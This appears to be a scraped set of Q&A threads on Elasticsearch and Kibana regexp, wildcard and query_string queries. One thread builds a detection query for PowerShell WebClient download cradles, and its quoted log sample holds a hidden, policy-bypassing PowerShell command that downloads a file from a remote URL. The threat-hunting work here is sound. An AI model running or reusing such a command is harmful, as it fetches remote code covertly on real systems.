Using regular expressions in elasticsearch term queries - regex

I want find all items filtered by ID match some regular expression like
*TEST123* //pattern for regexp
So expected result are items
ATEST123001
ATEST123002
ATEST123003
TTTTEST123001
...
I can create some script which scan full storage and save IDs in log-file which can check later. But I want to find some better solution
Updated
I tried
"query" : { "match_all" : { }, "filtered" : { "filter" : { "regexp": { "id":".test123." } } } }, }
I receive
//nested: ElasticsearchParseException[Expected field name but got START_OBJECT \"filtered\"]
When I tried
{
"regexp": {
"id": "test123"
}
}
//Parse Failure [No parser for element [regexp]]]
ES 1.7.4 and Lucene 4.10.4

You can use regular expression queries. The regexp query allows you to use regular expression term queries.
Ref:
https://www.elastic.co/guide/en/elasticsearch/reference/current/query-dsl-regexp-query.html
Sample regex query :
{
"regexp":{
"id": "*test123*"
}
}
Update:
In 2.0 regexp filter has been replaced by regexp query.
{
"query": {
"filtered": {
"filter": {
"regexp":{
"id":".*TEST123.*"
}
}
}
}
}

You can try Query String.
{
"query": {
"query_string": {
"default_field": "if",
"query": "*test123*"
}
}
}

Related

Kibana Query Language - find numbers in a field

I am struggling with a simple query that is supposed to work based on many tutorials but cannot make it work. Havin log field
Request sent, method=GET, headers={}, queryParams={forceArray=[true]}, entity=null, payload length=null} playerId=102
I am trying to get playerId with 3 digits value. Following query fails
log: /playerId=[0-9]{1,3}/
with KQLSyntaxError: Expected AND, OR, end of input, whitespace but "{" found. and log: /playerId=[0-9]{1,3}/
but supposed to work according to https://dzone.com/articles/getting-started-with-kibana-advanced-searches
This log: /playerId=[0-9][0-9][0-9]/returns basically everything with a single '0' character
This log: /playerId=*/ for some mysterious reasons returns nothing.
Edit
regular elastic search lucene based query does not work either
{
"query": {
"regexp": {
"log": {
"value": "*playerId*"
}
}
}
}
mapping:
{
"my-index" : {
"mappings" : {
"log" : {
"full_name" : "log",
"mapping" : {
"log" : {
"type" : "text",
"fields" : {
"keyword" : {
"type" : "keyword",
"ignore_above" : 256
}
}
}
}
}
}
}
}
any help appreciated
Edit
I validated my regex queries in https://regex101.com/
and they all work.
Edit 2
this works
"query": {
"match": {
"log": "playerId"
}
}
this return empty hits
"query": {
"regexp": {
"log": "playerId"
}
}
regards
This is because Kibana uses KQL (Kibana Query Language) by default and that doesn't support regular expressions.
You need to switch to the Lucene Query Language with the query string syntax which supports the regular expression you're trying.
Just click on KQL at the right end of the search bar to change the search syntax.
Also worth noting that regular expression queries are real performance hogger. You should really parse your logs before ingesting them so you can query the playerId field independently.
In any case, if you really want to do it that way, your query is not that far off from the real thing. Here is the correct version that will work for your case:
{
"query": {
"query_string": {
"query": "/.*playerId=[0-9]{3}/",
"default_field": "log.keyword"
}
}
}

AWS ElasticSearch Query for Keyword not getting results I expect

I have an ElasticSearch query that looks like:
{
"query": {
"constant_score": {
"filter": {
"bool": {
"should": [
{
"wildcard": {
"Message.keyword": "*System.Net.WebClient).DownloadString(*"
}
},
{
"wildcard": {
"Message.keyword": "*system.net.webclient).downloadfile(*"
}
}
]
}
}
}
}
}
And a Doc in my Index that includes:
message:Engine state is changed from None to Available. Details: NewEngineState=Available PreviousEngineState=None SequenceNumber=13 HostName=ConsoleHost HostVersion=5.1.18362.628 HostId=3dd1a50a-cc15-45e0-bf63-4456d556fb67 HostApplication=powershell.exe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://drive.google.com/uc?export=download EngineVersion=5.1.18362.628 RunspaceId=de762b62-056c-4be1-90bf-a12cfe6fbc72
As you can see above it includes:
(New-Object System.Net.WebClient).DownloadFile('https:....
It seems like the filter here should be matching the message, but when I execute the Query through Kibana, nothing matches even though I can see the doc above inside my index through Kibana UI if I just query for *.
I think maybe this is because the query above is querying for Message.keyword? How do I get it to successfully hit the document above?
Edit:
mapping: https://pastebin.com/cWN4jF3d
Sample data: https://pastebin.com/SyErqaG8
There are two reasons for the query not returning the result:
The field name in mapping is message whereas in query you are using Message.
A field with keyword datatype index the data as it is. This means it will be case sensitive as well. The document you shared has text System.Net.WebClient).DownloadFile( where you can see that there are characters with upper case whereas the search query you expect to match "*system.net.webclient).downloadfile(*" has all lower case characters.
Therefore the query should be:
{
"query": {
"constant_score": {
"filter": {
"bool": {
"should": [
{
"wildcard": {
"message.keyword": "*System.Net.WebClient).DownloadString(*"
}
},
{
"wildcard": {
"message.keyword": "*System.Net.WebClient).DownloadFile(*"
}
}
]
}
}
}
}
}
The keyword fields are used only for exact match. You will need to match the regular fields if you only want to match a substring / subset of the string, by querying on Message instead of Message.keyword:
{
"query": {
"constant_score": {
"filter": {
"bool": {
"should": [
{
"wildcard": {
"Message": "*System.Net.WebClient).DownloadString(*"
}
},
{
"wildcard": {
"Message": "*system.net.webclient).downloadfile(*"
}
}
]
}
}
}
}
}

Elasticsearch escape "¬" character in regex

I am stuck with this symbol "¬" when trying to run a elasticsearch regex query
to return from set of record in format "prefix-content¬value".
Example (not limited to website pattern, can be any value) : "website-website descriptions that not required¬www.google.com" .
{
"query": {
"filtered": {
"query": {
"match_all": {}
},
"filter": {
"regexp": {
"information": "(website?)(.*¬)(www.google.com?)"
}
}
}
}
}
Has anyone encounter such problem before and manage to handle this ? Thanks.

Query Elasticsearch by id using the regex or wildcard filter

I got a list of IDs:
bc2***********************13
b53***********************92
39f***********************bb
eb7***********************7a
80b***********************22
Each * is a unknown char and I need to find all IDs matching these patterns.
I tried the regex filter on field names like id, _id and ID, always with "bc2.*13" (or others) but always got no matches even for existing documents.
By default, _id field is not indexed : that's why you have no results.
Try setting _id field as analyzed in the mapping:
POST /test_id/
{
"mappings":{
"indexed":{
"_id":{
"index":"analyzed"
}
}
}
}
Adding some docs :
PUT /test_id/indexed/bc2***********************13
{
"content":"test1"
}
PUT /test_id/indexed/b53***********************92
{
"content":"test2"
}
I checked with one of your simple regexp query :
POST /test_id/_search
{
"query": {
"regexp": {
"_id": "bc2.*13"
}
}
}
Result :
"hits": {
"total": 1,
"max_score": 1,
"hits": [
{
"_index": "test_id",
"_type": "indexed",
"_id": "bc2***********************13",
"_score": 1,
"_source": {
"content": "test1"
}
}
]
}
Hope this helps :)
If the *'s are of a known and constant length:
bc2.{23}13|b53.{23}92|39f.{23}bb|eb7.{23}7a|80b.{23}22
DEMO
Else:
bc2.*?13|b53.*?92|39f.*?bb|eb7.*?7a|80b.*?22
DEMO2
Use the _uid field and the wildcard query:
GET yourIndex/yourType/_search
{
"query": {
"wildcard": {
"_uid": "bc2***********************13"
}
}
}

ElasticSearch and Regex queries

I am trying to query for documents that have dates within the body of the "content" field.
curl -XGET 'http://localhost:9200/index/_search' -d '{
"query": {
"regexp": {
"content": "^(0[1-9]|[12][0-9]|3[01])[- /.](0[1-9]|1[012])[- /.]((19|20)\\d\\d)$"
}
}
}'
Getting closer maybe?
curl -XGET 'http://localhost:9200/index/_search' -d '{
"filtered": {
"query": {
"match_all": {}
},
"filter": {
"regexp":{
"content" : "^(0[1-9]|[12][0-9]|3[01])[- /.](0[1-9]|1[012])[- /.]((19|20)\\d\\d)$"
}
}
}
}'
My regex seems to have been off. This regex has been validated on regex101.com The following query still returns nothing from the 175k documents I have.
curl -XPOST 'http://localhost:9200/index/_search?pretty=true' -d '{
"query": {
"regexp":{
"content" : "/[0-9]{4}-[0-9]{2}-[0-9]{2}|[0-9]{2}-[0-9]{2}-[0-9]{4}|[0-9]{2}/[0-9]{2}/[0-9]{4}|[0-9]{4}/[0-9]{2}/[0-9]{2}/g"
}
}
}'
I am starting to think that my index might not be set up for such a query. What type of field do you have to use to be able to use regular expressions?
mappings: {
doc: {
properties: {
content: {
type: string
}title: {
type: string
}host: {
type: string
}cache: {
type: string
}segment: {
type: string
}query: {
properties: {
match_all: {
type: object
}
}
}digest: {
type: string
}boost: {
type: string
}tstamp: {
format: dateOptionalTimetype: date
}url: {
type: string
}fields: {
type: string
}anchor: {
type: string
}
}
}
I want to find any record that has a date and graph the volume of documents by that date. Step 1. is to get this query working. Step 2. will be to pull the dates out and group them by them accordingly. Can someone suggest a way to get the first part working as I know the second part will be really tricky.
Thanks!
You should read Elasticsearch's Regexp Query documentation carefully, you are making some incorrect assumptions about how the regexp query works.
Probably the most important thing to understand here is what the string you are trying to match is. You are trying to match terms, not the entire string. If this is being indexed with StandardAnalyzer, as I would suspect, your dates will be separated into multiple terms:
"01/01/1901" becomes tokens "01", "01" and "1901"
"01 01 1901" becomes tokens "01", "01" and "1901"
"01-01-1901" becomes tokens "01", "01" and "1901"
"01.01.1901" actually will be a single token: "01.01.1901" (Due to decimal handling, see UAX #29)
You can only match a single, whole token with a regexp query.
Elasticsearch (and lucene) don't support full Perl-compatible regex syntax.
In your first couple of examples, you are using anchors, ^ and $. These are not supported. Your regex must match the entire token to get a match anyway, so anchors are not needed.
Shorthand character classes like \d (or \\d) are also not supported. Instead of \\d\\d, use [0-9]{2}.
In your last attempt, you are using /{regex}/g, which is also not supported. Since your regex needs to match the whole string, the global flag wouldn't even make sense in context. Unless you are using a query parser which uses them to denote a regex, your regex should not be wrapped in slashes.
(By the way: How did this one validate on regex101? You have a bunch of unescaped /s. It complains at me when I try it.)
To support this sort of query on such an analyzed field, you'll probably want to look to span queries, and particularly Span Multiterm and Span Near. Perhaps something like:
{
"span_near" : {
"clauses" : [
{ "span_multi" : {
"match": {
"regexp": {"content": "0[1-9]|[12][0-9]|3[01]"}
}
}},
{ "span_multi" : {
"match": {
"regexp": {"content": "0[1-9]|1[012]"}
}
}},
{ "span_multi" : {
"match": {
"regexp": {"content": "(19|20)[0-9]{2}"}
}
}}
],
"slop" : 0,
"in_order" : true
}
}
For newer elasticsearch versions (tested 8.5).
We can use .keyword in the field. It will match the whole sentence.
{
"size": 10,
"_source": [
"load",
"unload"
],
"query": {
"bool": {
"should": [
{
"regexp": {
"load.keyword": {
"value": ".*Search Term.*",
"flags": "ALL"
}
}
}
]
}
}
}